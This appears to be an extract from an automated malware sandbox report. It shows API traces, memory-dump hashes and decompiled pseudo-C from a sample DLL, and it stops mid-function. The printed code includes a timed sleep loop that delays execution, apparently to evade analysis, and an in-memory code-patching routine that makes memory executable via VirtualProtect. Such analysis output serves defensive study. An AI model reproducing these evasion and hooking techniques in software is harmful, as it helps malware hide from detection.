    0x6d8648ae
    0x6d8648af
    0x6d8648b4
    0x6d8648ba
    0x6d8648ba
    0x6d86489a
    0x6d8648bf
    0x6d8648c1
    0x6d8648c8
    0x6d8648d2
    0x6d8648d4
    0x6d8648d7
    0x6d8648d9
    0x6d8648e5
    0x6d86490d
    0x6d86490d
    0x00000000
    0x6d8648c3
    0x6d8648c3
    0x6d8648c6
    0x00000000
    0x00000000
    0x00000000
    0x6d8648c6
    0x6d8648c1
    0x6d864849
    0x6d86484c
    0x00000000
    0x00000000
    0x6d86484e
    0x00000000
    0x6d86484e
    0x6d864831
    0x6d864837
    0x00000000
    0x00000000
    0x6d864839
    0x00000000

    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true
    • Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: dllmain_raw$dllmain_crt_dispatch
    • String ID:
    • API String ID: 3136044242-0
    • Opcode ID: 80deac03cab6595b6fed0ab2f68c28dc61a0495b731434ce268750e10c36915c
    • Instruction ID: 99c3fcccf2652fcf88d33336516c8d3be4d5933bc55447c384fbaef5a8ff617f
    • Opcode Fuzzy Hash: 80deac03cab6595b6fed0ab2f68c28dc61a0495b731434ce268750e10c36915c
    • Instruction Fuzzy Hash: 6221B172D4C2DAAADB118F5DD858A7F3A79EBC9BB8F014915F91457224C3318D118BB0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetCurrentProcess.KERNEL32(00000008,00000000), ref: 030315B8
    • OpenProcessToken.ADVAPI32(00000000), ref: 030315BF
    • GetTokenInformation.KERNELBASE(00000000,00000012(TokenIntegrityLevel),00000001,00000004,00000000), ref: 030315DC
    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 030315E5
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: ProcessToken$ChangeCloseCurrentFindInformationNotificationOpen
    • String ID:
    • API String ID: 2406157124-0
    • Opcode ID: c1eb92222d7efb02419a26ec1ee69d94e17f2fc769466664f6bf7fe1d0f610e5
    • Instruction ID: be73e7fb4a675a3ed1845268e52419a228ee5ab8fffee3ea345ba7c6c843a15e
    • Opcode Fuzzy Hash: c1eb92222d7efb02419a26ec1ee69d94e17f2fc769466664f6bf7fe1d0f610e5
    • Instruction Fuzzy Hash: 3BF012B5D11108FBDF00FBE1DA0ABDDB7BCAB09346F144065E202E1091D7748B14DB51
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6D861150() {
    				long _t7;
    				signed int _t10;
    				void* _t17;
    
    				_t10 =  *0x6d8c13a0; // 0x11
    				_t5 =  *0x6d8c1a7c; // 0x80000001
    				if(_t5 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t10 * 4)) + 4))) {
    					E6D8641C3(_t5, 0x6d8c1a7c);
    					_t17 = _t17 + 4;
    					if( *0x6d8c1a7c == 0xffffffff) {
    						 *0x6d8c1a80 = GetTickCount();
    						E6D864179(0x6d8c1a7c);
    						_t17 = _t17 + 4;
    					}
    				}
    				_t7 = GetTickCount();
    				_t5 = _t7 -  *0x6d8c1a80;
    				if(_t7 -  *0x6d8c1a80 >= 0x7530) {
    					goto ( *0x6d8c1a78);
    				} else {
    					L3:
    					Sleep(0x3e8); // executed
    					goto L3;
    				}
    			}






    0x6d861159
    0x6d861169
    0x6d861174
    0x6d8611a6
    0x6d8611ab
    0x6d8611b5
    0x6d8611be
    0x6d8611c3
    0x6d8611c8
    0x6d8611c8
    0x6d8611b5
    0x6d861176
    0x6d861178
    0x6d861183
    0x6d86119b
    0x6d861185
    0x6d861190
    0x6d861195
    0x00000000
    0x6d861195

    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true
    • Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: CountTick$Init_thread_footerSleep
    • String ID:
    • API String ID: 3912859873-0
    • Opcode ID: 2245d31de74f23950dded8d1530a93d5d2bc1a873112d0b0c039b592b1ee82d8
    • Instruction ID: a6f84ffc5a6cc88b5540270d2607a6d375d8aeb8bdab803195baf70b62539800
    • Opcode Fuzzy Hash: 2245d31de74f23950dded8d1530a93d5d2bc1a873112d0b0c039b592b1ee82d8
    • Instruction Fuzzy Hash: 2DF06276C44699DFEB109BA9D88CA287774B70F370B054D66D61687E82CB35A900CBE2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			E6D8627D0(void* __edi, signed char _a4, signed char _a8, signed char _a12, signed char _a16, signed char _a20) {
    				signed char _v8;
    				signed char _v12;
    				void* _v16;
    				signed char _v20;
    				signed int _v24;
    				signed char _v28;
    				signed char _v32;
    				signed char _v36;
    				intOrPtr _v40;
    				signed char _v44;
    				signed char _v48;
    				signed char _v52;
    				signed char _v56;
    				long _v60;
    				signed char _v64;
    				signed char _v68;
    				void* __ebp;
    				long _t172;
    				signed char _t178;
    				signed char _t180;
    				signed char _t199;
    				int _t201;
    				signed char _t209;
    				void* _t219;
    				signed char _t222;
    				signed char _t227;
    				signed char _t251;
    				void* _t304;
    				void* _t305;
    				void* _t306;
    				void* _t307;
    
    				_t304 = __edi;
    				_v28 = 0;
    				if(_a12 != 0) {
    					 *_a12 = 0;
    				}
    				if(_a16 != 0) {
    					 *_a16 = 0;
    				}
    				if(_a20 != 0) {
    					 *_a20 = 0;
    				}
    				if(_a8 != 0) {
    					_t172 = GetCurrentThreadId();
    					__eflags =  *0x6d8c1014 - _t172;
    					if( *0x6d8c1014 == _t172) {
    						__eflags =  *0x6d8c1018;
    						if( *0x6d8c1018 == 0) {
    							__eflags = _a4;
    							if(_a4 != 0) {
    								__eflags =  *_a4;
    								if( *_a4 != 0) {
    									_v16 =  *_a4;
    									_v8 = 0;
    									_v20 = 0;
    									_v16 = E6D862BF0(_v16, 0);
    									_a8 = E6D862BF0(_a8, 0);
    									__eflags = _a8 - _v16;
    									if(_a8 != _v16) {
    										__eflags = _a16;
    										if(_a16 != 0) {
    											 *_a16 = _v16;
    										}
    										__eflags = _a20;
    										if(__eflags != 0) {
    											 *_a20 = _a8;
    										}
    										_push(0x18);
    										_t178 = E6D864299(__eflags);
    										_t306 = _t305 + 4;
    										_v64 = _t178;
    										_v20 = _v64;
    										__eflags = _v20;
    										if(_v20 != 0) {
    											_t180 = E6D861840(_t304, _v16); // executed
    											_t307 = _t306 + 4;
    											_v8 = _t180;
    											__eflags = _v8;
    											if(_v8 != 0) {
    												__eflags = _a12;
    												if(_a12 != 0) {
    													 *_a12 = _v8;
    												}
    												E6D865880(_t304, _v8 + 0x38, 0, 8);
    												_t307 = _t307 + 0xc;
    												_v32 = _v16;
    												_v12 = _v8;
    												_t237 = _v12 + 0x1e;
    												__eflags = _t237;
    												_v44 = _t237;
    												_v24 = 0;
    												_v40 = 5;
    												_v36 = 0;
    												while(1) {
    													__eflags = _v24 - _v40;
    													if(__eflags >= 0) {
    														goto L44;
    													}
    													_v52 = _v32;
    													_v48 = 0;
    													_v32 = E6D864050(__eflags, _v12,  &_v44, _v32, 0,  &_v48);
    													_v12 = _v32 - _v52 + _v48 + _v12;
    													_v24 = _v32 - _v16;
    													 *(_v8 + _v36 + 0x38) =  *(_v8 + _v36 + 0x38) & 0x000000f8 | _v24 & 0x00000007;
    													_t219 = _v8 + _v36;
    													_t237 =  *(_t219 + 0x38) & 0x00000007 | (_v12 - _v8 & 0x0000001f) << 0x00000003;
    													 *(_v8 + _v36 + 0x38) =  *(_t219 + 0x38) & 0x00000007 | (_v12 - _v8 & 0x0000001f) << 0x00000003;
    													_v36 = _v36 + 1;
    													__eflags = _v36 - 8;
    													if(_v36 < 8) {
    														_t237 = _v52;
    														_t222 = E6D861A70(_v52);
    														_t307 = _t307 + 4;
    														__eflags = _t222;
    														if(_t222 == 0) {
    															continue;
    														}
    														while(1) {
    															L44:
    															__eflags = _v24 - _v40;
    															if(_v24 >= _v40) {
    																break;
    															}
    															_t209 = E6D861DE0(_v32);
    															_t307 = _t307 + 4;
    															_v56 = _t209;
    															__eflags = _v56;
    															if(_v56 != 0) {
    																_t237 = _v32 + _v56;
    																_v32 = _v32 + _v56;
    																_v24 = _v32 - _v16;
    																continue;
    															}
    															break;
    														}
    														__eflags = _v24 - _v40;
    														if(_v24 < _v40) {
    															L50:
    															_v28 = 9;
    															__eflags =  *0x6d8c100c;
    															if( *0x6d8c100c == 0) {
    																goto L26;
    															}
    															goto L27;
    														}
    														__eflags = _v36 - 8;
    														if(_v36 <= 8) {
    															__eflags = _v12 - _v44;
    															if(_v12 > _v44) {
    																asm("int3");
    															}
    															 *(_v8 + 0x1e) = _v12 - _v8;
    															 *((char*)(_v8 + 0x36)) = _v24;
    															E6D8659E0(_v8 + 0x20, _v16, _v24);
    															_t307 = _t307 + 0xc;
    															__eflags = _v24 - 0x1e - _v40;
    															if(_v24 <= 0x1e - _v40) {
    																 *((intOrPtr*)(_v8 + 0x40)) = _v16 + _v24;
    																 *(_v8 + 0x44) = _a8;
    																_v12 = ( *(_v8 + 0x1e) & 0x000000ff) + _v8;
    																_v12 = E6D861DA0(_v8, _v12,  *((intOrPtr*)(_v8 + 0x40)));
    																_t199 = E6D861D70(_v12, _v44);
    																_t307 = _t307 + 0x10;
    																_v12 = _t199;
    																_v60 = 0;
    																_t201 = VirtualProtect(_v16, _v24, 0x40,  &_v60); // executed
    																__eflags = _t201;
    																if(_t201 != 0) {
    																	 *(_v20 + 4) = 0;
    																	 *(_v20 + 8) = _a4;
    																	 *(_v20 + 0x10) = _v8;
    																	 *(_v20 + 0xc) = _v16;
    																	 *((intOrPtr*)(_v20 + 0x14)) = _v60;
    																	_t251 =  *0x6d8c1024; // 0x0
    																	 *_v20 = _t251;
    																	 *0x6d8c1024 = _v20;
    																	__eflags = 0;
    																	return 0;
    																}
    																_v28 = GetLastError();
    															} else {
    																_v28 = 6;
    															}
    															goto L26;
    														}
    														goto L50;
    													}
    													goto L44;
    												}
    												goto L44;
    											}
    											_v28 = 8;
    											goto L26;
    										} else {
    											_v28 = 8;
    											L26:
    											_t237 = _v28;
    											 *0x6d8c1018 = _v28;
    											L27:
    											__eflags = _v8;
    											if(_v8 != 0) {
    												E6D861CC0(_t237, _v8);
    												_t307 = _t307 + 4;
    												_v8 = 0;
    												__eflags = _a12;
    												if(_a12 != 0) {
    													 *_a12 = 0;
    												}
    											}
    											__eflags = _v20;
    											if(_v20 != 0) {
    												_v68 = _v20;
    												L6D864090(_v68);
    												_v20 = 0;
    											}
    											 *0x6d8c101c = _a4;
    											return _v28;
    										}
    									}
    									__eflags =  *0x6d8c100c;
    									if( *0x6d8c100c == 0) {
    										goto L26;
    									}
    									goto L27;
    								}
    								_v28 = 6;
    								 *0x6d8c1018 = _v28;
    								 *0x6d8c101c = _a4;
    								return _v28;
    							}
    							return 6;
    						}
    						_t227 =  *0x6d8c1018; // 0x0
    						return _t227;
    					}
    					return 0x10dd;
    				} else {
    					return 0x57;
    				}
    			}


































    0x6d8627d0
    0x6d8627d6
    0x6d8627e1
    0x6d8627e6
    0x6d8627e6
    0x6d8627f0
    0x6d8627f5
    0x6d8627f5
    0x6d8627ff
    0x6d862804
    0x6d862804
    0x6d86280e
    0x6d86281a
    0x6d86281f
    0x6d862825
    0x6d862831
    0x6d862838
    0x6d862844
    0x6d862848
    0x6d862857
    0x6d86285a
    0x6d862882
    0x6d862885
    0x6d86288c
    0x6d86289e
    0x6d8628ac
    0x6d8628b2
    0x6d8628b5
    0x6d8628ca
    0x6d8628ce
    0x6d8628d6
    0x6d8628d6
    0x6d8628d8
    0x6d8628dc
    0x6d8628e4
    0x6d8628e4
    0x6d8628e6
    0x6d8628e8
    0x6d8628ed
    0x6d8628f0
    0x6d8628f6
    0x6d8628f9
    0x6d8628fd
    0x6d86296a
    0x6d86296f
    0x6d862972
    0x6d862975
    0x6d862979
    0x6d862984
    0x6d862988
    0x6d862990
    0x6d862990
    0x6d86299d
    0x6d8629a2
    0x6d8629a8
    0x6d8629ae
    0x6d8629b4
    0x6d8629b4
    0x6d8629b7
    0x6d8629ba
    0x6d8629c1
    0x6d8629c8
    0x6d8629cf
    0x6d8629d2
    0x6d8629d5
    0x00000000
    0x00000000
    0x6d8629de
    0x6d8629e1
    0x6d8629ff
    0x6d862a0e
    0x6d862a17
    0x6d862a33
    0x6d862a45
    0x6d862a4e
    0x6d862a56
    0x6d862a5f
    0x6d862a62
    0x6d862a66
    0x6d862a6a
    0x6d862a6e
    0x6d862a73
    0x6d862a76
    0x6d862a78
    0x00000000
    0x6d862a7c
    0x6d862a81
    0x6d862a81
    0x6d862a84
    0x6d862a87
    0x00000000
    0x00000000
    0x6d862a8d
    0x6d862a92
    0x6d862a95
    0x6d862a98
    0x6d862a9c
    0x6d862aa3
    0x6d862aa6
    0x6d862aaf
    0x00000000
    0x6d862aaf
    0x00000000
    0x6d862a9e
    0x6d862ab7
    0x6d862aba
    0x6d862ac2
    0x6d862ac2
    0x6d862ac9
    0x6d862ad0
    0x00000000
    0x6d862ad9
    0x00000000
    0x6d862ad2
    0x6d862abc
    0x6d862ac0
    0x6d862ae1
    0x6d862ae4
    0x6d862ae6
    0x6d862ae6
    0x6d862af0
    0x6d862af9
    0x6d862b0b
    0x6d862b10
    0x6d862b1b
    0x6d862b1e
    0x6d862b35
    0x6d862b3e
    0x6d862b4b
    0x6d862b61
    0x6d862b6c
    0x6d862b71
    0x6d862b74
    0x6d862b77
    0x6d862b8c
    0x6d862b91
    0x6d862b93
    0x6d862ba5
    0x6d862bb2
    0x6d862bbb
    0x6d862bc4
    0x6d862bcd
    0x6d862bd3
    0x6d862bd9
    0x6d862bde
    0x6d862be4
    0x00000000
    0x6d862be4
    0x6d862b9a
    0x6d862b20
    0x6d862b20
    0x6d862b20
    0x00000000
    0x6d862b1e
    0x00000000
    0x6d862ac0
    0x00000000
    0x6d862a68
    0x00000000
    0x6d8629cf
    0x6d86297b
    0x00000000
    0x6d8628ff
    0x6d8628ff
    0x6d862906
    0x6d862906
    0x6d862909
    0x6d86290f
    0x6d86290f
    0x6d862913
    0x6d862919
    0x6d86291e
    0x6d862921
    0x6d862928
    0x6d86292c
    0x6d862931
    0x6d862931
    0x6d86292c
    0x6d862937
    0x6d86293b
    0x6d862940
    0x6d862947
    0x6d86294f
    0x6d86294f
    0x6d862959
    0x00000000
    0x6d86295e
    0x6d8628fd
    0x6d8628b7
    0x6d8628be
    0x00000000
    0x6d8628c6
    0x00000000
    0x6d8628c0
    0x6d86285c
    0x6d862866
    0x6d86286f
    0x00000000
    0x6d862875
    0x00000000
    0x6d86284a
    0x6d86283a
    0x00000000
    0x6d86283a
    0x00000000
    0x6d862810
    0x00000000
    0x6d862810

    APIs
    • GetCurrentThreadId.KERNEL32 ref: 6D86281A
    Memory Dump Source
    • Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true
    • Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: CurrentThread
    • String ID:
    • API String ID: 2882836952-0
    • Opcode ID: aec6a2d52a802f3a88c0da960712432daba671d9c497b942d5b4b2a7e22ce4c1
    • Instruction ID: 302cac7d0fc6f7de3afa45b941b3a1876926d5afa136dfa29728c1a6e749a26e
    • Opcode Fuzzy Hash: aec6a2d52a802f3a88c0da960712432daba671d9c497b942d5b4b2a7e22ce4c1
    • Instruction Fuzzy Hash: 69E107B4D0424ADFDB14CF98D998BEEBBB1FF48314F208599E914A7344D3789A44CBA1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 83%
    			E6D867392(void* __ebx, intOrPtr* _a4) {
    				intOrPtr* _v8;
    				intOrPtr _v12;
    				intOrPtr* _v40;
    				intOrPtr _t14;
    				intOrPtr _t15;
    				intOrPtr _t20;
    				intOrPtr _t21;
    				intOrPtr _t22;
    				void* _t24;
    				void* _t26;
    				intOrPtr _t27;
    				intOrPtr* _t29;
    				intOrPtr* _t33;
    				intOrPtr* _t36;
    				intOrPtr* _t41;
    				intOrPtr _t50;
    				intOrPtr _t51;
    				void* _t53;
    				intOrPtr* _t54;
    				intOrPtr* _t56;
    				intOrPtr* _t59;
    				void* _t62;
    				intOrPtr _t63;
    				intOrPtr* _t64;
    				void* _t68;
    
    				_push(_t35);
    				_t33 = _a4;
    				_t50 = 0;
    				_t59 = _t33;
    				_t14 =  *_t33;
    				while(_t14 != 0) {
    					if(_t14 != 0x3d) {
    						_t50 = _t50 + 1;
    					}
    					_t36 = _t59;
    					_t53 = _t36 + 1;
    					do {
    						_t15 =  *_t36;
    						_t36 = _t36 + 1;
    					} while (_t15 != 0);
    					_t59 = _t59 + 1 + _t36 - _t53;
    					_t14 =  *_t59;
    				}
    				_t3 = _t50 + 1; // 0x1
    				_t54 = E6D868473(_t3, 4);
    				if(_t54 == 0) {
    					L19:
    					_t54 = 0;
    					goto L20;
    				} else {
    					_v8 = _t54;
    					while(1) {
    						_t51 =  *_t33;
    						if(_t51 == 0) {
    							break;
    						}
    						_t41 = _t33;
    						_t62 = _t41 + 1;
    						do {
    							_t20 =  *_t41;
    							_t41 = _t41 + 1;
    						} while (_t20 != 0);
    						_t21 = _t41 - _t62 + 1;
    						_v12 = _t21;
    						if(_t51 == 0x3d) {
    							L15:
    							_t33 = _t33 + _t21;
    							continue;
    						} else {
    							_t22 = E6D868473(_t21, 1); // executed
    							_t63 = _t22;
    							if(_t63 == 0) {
    								_push(_t54);
    								L22();
    								E6D867CC2(0);
    								goto L19;
    							} else {
    								_t24 = E6D867AFB(_t63, _v12, _t33);
    								_t68 = _t68 + 0xc;
    								if(_t24 != 0) {
    									_push(0);
    									_push(0);
    									_push(0);
    									_push(0);
    									_push(0);
    									_t26 = E6D8669AE();
    									asm("int3");
    									_push(_t63);
    									_t64 = _v40;
    									if(_t64 != 0) {
    										_t27 =  *_t64;
    										_push(_t54);
    										_t56 = _t64;
    										while(_t27 != 0) {
    											E6D867CC2(_t27);
    											_t56 = _t56 + 4;
    											_t27 =  *_t56;
    										}
    										_t26 = E6D867CC2(_t64);
    									}
    									return _t26;
    								} else {
    									_t29 = _v8;
    									 *_t29 = _t63;
    									_v8 = _t29 + 4;
    									E6D867CC2(0);
    									_t21 = _v12;
    									goto L15;
    								}
    							}
    						}
    						goto L28;
    					}
    					L20:
    					E6D867CC2(0);
    					return _t54;
    				}
    				L28:
    			}




























    0x6d867398
    0x6d86739a
    0x6d86739d
    0x6d8673a1
    0x6d8673a3
    0x6d8673bf
    0x6d8673a9
    0x6d8673ab
    0x6d8673ab
    0x6d8673ac
    0x6d8673ae
    0x6d8673b1
    0x6d8673b1
    0x6d8673b3
    0x6d8673b4
    0x6d8673bb
    0x6d8673bd
    0x6d8673bd
    0x6d8673c3
    0x6d8673ce
    0x6d8673d4
    0x6d867444
    0x6d867444
    0x00000000
    0x6d8673d6
    0x6d8673d6
    0x6d86742d
    0x6d86742d
    0x6d867431
    0x00000000
    0x00000000
    0x6d8673db
    0x6d8673dd
    0x6d8673e0
    0x6d8673e0
    0x6d8673e2
    0x6d8673e3
    0x6d8673e9
    0x6d8673ec
    0x6d8673f2
    0x6d86742b
    0x6d86742b
    0x00000000
    0x6d8673f4
    0x6d8673f7
    0x6d8673fc
    0x6d867402
    0x6d867435
    0x6d867436
    0x6d86743d
    0x00000000
    0x6d867404
    0x6d867409
    0x6d86740e
    0x6d867413
    0x6d867457
    0x6d867458
    0x6d867459
    0x6d86745a
    0x6d86745b
    0x6d86745c
    0x6d867461
    0x6d867467
    0x6d867468
    0x6d86746d
    0x6d86746f
    0x6d867471
    0x6d867472
    0x6d867482
    0x6d867477
    0x6d86747c
    0x6d86747f
    0x6d867481
    0x6d867487
    0x6d86748d
    0x6d867490
    0x6d867415
    0x6d867415
    0x6d86741a
    0x6d86741f
    0x6d867422
    0x6d867427
    0x00000000
    0x6d86742a
    0x6d867413
    0x6d867402
    0x00000000
    0x6d8673f2
    0x6d867446
    0x6d867448
    0x6d867454
    0x6d867454
    0x00000000

    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true
    • Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
    • Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
    • Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free
    • String ID:
    • API String ID: 269201875-0
    • Opcode ID: 5fe2170902e34f347e0c7705c383be6b20f5d70d556c1a25ff4744f002635704
    • Instruction ID: f88c1332c7e73ce0d0d60eeed5af58c0b7ae4e8b9c8efdde93a2aa40c513c0aa
    • Opcode Fuzzy Hash: 5fe2170902e34f347e0c7705c383be6b20f5d70d556c1a25ff4744f002635704
    • Instruction Fuzzy Hash: 2D21C232E0C1C16BDB05CE7C5C4DFB57B69CF46B74F254859FA449B640DA22490283F0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • __RTC_Initialize.LIBCMT ref: 03032524
      • Part of subcall function 03032996: RtlInitializeSListHead.NTDLL(03078F38), ref: 0303299B
    • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 0303258E
    • ___scrt_fastfail.LIBCMT ref: 030325D8
    Memory Dump Source
    • Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false
    Similarity
    • API ID: Initialize$HeadList___scrt_fastfail___scrt_is_nonwritable_in_current_image
    • String ID:
    • API String ID: 2097537958-0
    • Opcode ID: 9202ffd4d7297e25fea9c01b7b8063f73500238950ce72408e2b1730fd26ffdb
    • Instruction ID: e2a8bd5d6bc5546934b0b47141cc0b6eb76a12b206bddb89fe009fe84f4e8474
    • Opcode Fuzzy Hash: 9202ffd4d7297e25fea9c01b7b8063f73500238950ce72408e2b1730fd26ffdb
    • Instruction Fuzzy Hash: FD213239A873049ECB20FBB8E4227DD7BAD9FA3225F044C5AC8802F2C2DB714240C665
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 83%
    			E6D864667(void* __ecx, void* __edx, void* __eflags) {
    				void* _t43;
    				char _t44;
    				signed int _t48;
    				signed int _t54;
    				signed int _t55;
    				signed int _t56;
    				signed int _t59;
    				signed char _t67;
    				signed int _t69;
    				void* _t80;
    				char _t84;
    				signed int _t85;
    				void* _t88;
    				void* _t89;
    				void* _t101;
    				void* _t105;
    				signed int _t109;
    				void* _t112;
    				signed int _t114;
    				signed int _t118;
    				intOrPtr* _t120;
    				void* _t122;
    
    				_t104 = __edx;
    				_t88 = __ecx;
    				E6D864EC0(0x6d8754f0, 0x10);
    				_t43 = E6D864408(_t88, __edx, 0); // executed
    				_pop(_t89);
    				if(_t43 == 0) {
    					L11:
    					_t44 = 0;
    					__eflags = 0;
    					goto L12;
    				} else {
    					 *((char*)(_t122 - 0x1d)) = E6D86430D();
    					_t84 = 1;
    					 *((char*)(_t122 - 0x19)) = 1;
    					 *(_t122 - 4) =  *(_t122 - 4) & 0x00000000;
    					_t131 =  *0x6d8c1050;
    					if( *0x6d8c1050 != 0) {
    						E6D864A9B(_t104, _t105, _t112, 7);
    						asm("int3");
    						E6D864EC0(0x6d875510, 0x10);
    						_t48 =  *0x6d8c1074; // 0x1
    						__eflags = _t48;
    						if(_t48 > 0) {
    							 *0x6d8c1074 = _t48 - 1;
    							 *(_t122 - 0x1c) = 1;
    							 *(_t122 - 4) =  *(_t122 - 4) & 0x00000000;
    							 *((char*)(_t122 - 0x20)) = E6D86430D();
    							 *(_t122 - 4) = 1;
    							__eflags =  *0x6d8c1050 - 2;
    							if( *0x6d8c1050 != 2) {
    								E6D864A9B(_t104, 1, _t112, 7);
    								asm("int3");
    								E6D864EC0(0x6d875538, 0xc);
    								_t109 =  *(_t122 + 0xc);
    								__eflags = _t109;
    								if(_t109 != 0) {
    									L23:
    									 *(_t122 - 4) =  *(_t122 - 4) & 0x00000000;
    									__eflags = _t109 - 1;
    									if(_t109 == 1) {
    										L26:
    										_t85 =  *(_t122 + 0x10);
    										_t114 = E6D864929( *((intOrPtr*)(_t122 + 8)), _t109, _t85);
    										 *(_t122 - 0x1c) = _t114;
    										__eflags = _t114;
    										if(_t114 != 0) {
    											_t55 = E6D864614(_t89, _t104,  *((intOrPtr*)(_t122 + 8)), _t109, _t85); // executed
    											_t114 = _t55;
    											 *(_t122 - 0x1c) = _t114;
    											__eflags = _t114;
    											if(_t114 != 0) {
    												goto L28;
    											}
    										}
    									} else {
    										__eflags = _t109 - 2;
    										if(_t109 == 2) {
    											goto L26;
    										} else {
    											_t85 =  *(_t122 + 0x10);
    											L28:
    											_push(_t85);
    											_t56 = E6D861400( *((intOrPtr*)(_t122 + 8)), _t109); // executed
    											_t114 = _t56;
    											 *(_t122 - 0x1c) = _t114;
    											__eflags = _t109 - 1;
    											if(_t109 == 1) {
    												__eflags = _t114;
    												if(_t114 == 0) {
    													_push(_t85);
    													_t59 = E6D861400( *((intOrPtr*)(_t122 + 8)), _t56);
    													__eflags = _t85;
    													_t34 = _t85 != 0;
    													__eflags = _t34;
    													_push((_t59 & 0xffffff00 | _t34) & 0x000000ff);
    													L14();
    													_pop(_t89);
    													E6D864929( *((intOrPtr*)(_t122 + 8)), _t114, _t85);
    												}
    											}
    											__eflags = _t109;
    											if(_t109 == 0) {
    												L33:
    												_t114 = E6D864614(_t89, _t104,  *((intOrPtr*)(_t122 + 8)), _t109, _t85);
    												 *(_t122 - 0x1c) = _t114;
    												__eflags = _t114;
    												if(_t114 != 0) {
    													_t114 = E6D864929( *((intOrPtr*)(_t122 + 8)), _t109, _t85);
    													 *(_t122 - 0x1c) = _t114;
    												}
    											} else {
    												__eflags = _t109 - 3;
    												if(_t109 == 3) {
    													goto L33;
    												}
    											}
    										}
    									}
    									 *(_t122 - 4) = 0xfffffffe;
    									_t54 = _t114;
    								} else {
    									__eflags =  *0x6d8c1074 - _t109; // 0x1
    									if(__eflags > 0) {
    										goto L23;
    									} else {
    										_t54 = 0;
    									}
    								}
    								 *[fs:0x0] =  *((intOrPtr*)(_t122 - 0x10));
    								return _t54;
    							} else {
    								E6D8643D8(_t89);
    								E6D864FBC();
    								E6D865024();
    								 *0x6d8c1050 =  *0x6d8c1050 & 0x00000000;
    								 *(_t122 - 4) =  *(_t122 - 4) & 0x00000000;
    								E6D864803();
    								_t67 = E6D864579( *((intOrPtr*)(_t122 + 8)), 0);
    								asm("sbb esi, esi");
    								_t118 =  ~(_t67 & 0x000000ff) & 1;
    								__eflags = _t118;
    								 *(_t122 - 0x1c) = _t118;
    								 *(_t122 - 4) = 0xfffffffe;
    								E6D864810();
    								_t69 = _t118;
    								goto L18;
    							}
    						} else {
    							_t69 = 0;
    							L18:
    							 *[fs:0x0] =  *((intOrPtr*)(_t122 - 0x10));
    							return _t69;
    						}
    					} else {
    						 *0x6d8c1050 = 1;
    						if(E6D86436A(_t131) != 0) {
    							E6D864FB0(E6D864FF8());
    							E6D864FD4();
    							_t80 = E6D867A4D(0x6d87017c, 0x6d870190); // executed
    							_pop(_t101);
    							if(_t80 == 0 && E6D86433F(1, _t101) != 0) {
    								E6D867A08(_t101, 0x6d87016c, 0x6d870178);
    								 *0x6d8c1050 = 2;
    								_t84 = 0;
    								 *((char*)(_t122 - 0x19)) = 0;
    							}
    						}
    						 *(_t122 - 4) = 0xfffffffe;
    						E6D86474A();
    						if(_t84 != 0) {
    							goto L11;
    						} else {
    							_t120 = E6D864FF1();
    							_t137 =  *_t120;
    							if( *_t120 != 0) {
    								_push(_t120);
    								if(E6D8644C8(_t137) != 0) {
    									 *0x6d870168( *((intOrPtr*)(_t122 + 8)), 2,  *(_t122 + 0xc));
    									 *((intOrPtr*)( *_t120))();
    								}
    							}
    							 *0x6d8c1074 =  *0x6d8c1074 + 1;
    							_t44 = 1;
    						}
    						L12:
    						 *[fs:0x0] =  *((intOrPtr*)(_t122 - 0x10));
    						return _t44;
